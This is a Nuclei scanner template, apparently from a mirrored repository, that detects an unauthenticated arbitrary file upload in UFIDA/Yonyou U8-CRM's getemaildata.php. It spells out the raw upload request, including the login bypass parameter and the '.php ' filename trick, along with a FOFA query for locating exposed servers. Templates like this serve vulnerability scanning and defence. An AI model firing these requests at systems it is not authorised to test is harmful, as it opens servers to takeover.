daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml

62 lines
2.1 KiB
YAML
Raw Blame History

id: yonyou-u8-crm-fileupload
info:
name: UFIDA U8-CRM getemaildata - Arbitary File Upload
author: SleepingBag945,pussycat0x
severity: critical
description: |
There is an arbitrary file upload vulnerability in the getemaildata.php file of UFIDA U8 CRM customer relationship management system. An attacker can obtain server permissions through the vulnerability and attack the server.
metadata:
verified: true
max-request: 2
fofa-query: body="用友U8CRM"
tags: yonyou,file-upload,u8-crm,intrusive
http:
- raw:
- |
POST /ajax/getemaildata.php?DontCheckLogin=1 HTTP/1.1
Host: {{Hostname}}
Content-Length: 300
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAVuAKsvesmnWtgEP
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=ibru7pqnplhi720caq0ev8uvt0
------WebKitFormBoundaryAVuAKsvesmnWtgEP
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream
{{randstr}}
------WebKitFormBoundaryAVuAKsvesmnWtgEP
Content-Disposition: form-data; name="upload"
upload
------WebKitFormBoundaryAVuAKsvesmnWtgEP--
- |
GET /tmpfile/{{path}}.tmp.mht HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_1==200 && status_code_2==200"
- "contains(body_2, '{{randstr}}')"
condition: and
extractors:
- type: regex
part: body_1
internal: true
name: path
group: 1
regex:
- '([a-zA-Z0-9]+)\.tmp\.mht'
# digest: 4b0a00483046022100e656811347cdd4dda04256a5cda88439ae6fd34b6d69e0c3b063978435ae9a6b02210092c415a317f35ec9f01af48589cb0b2acad5549bc2ab18a1b3399d9fc0a8d0b2:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink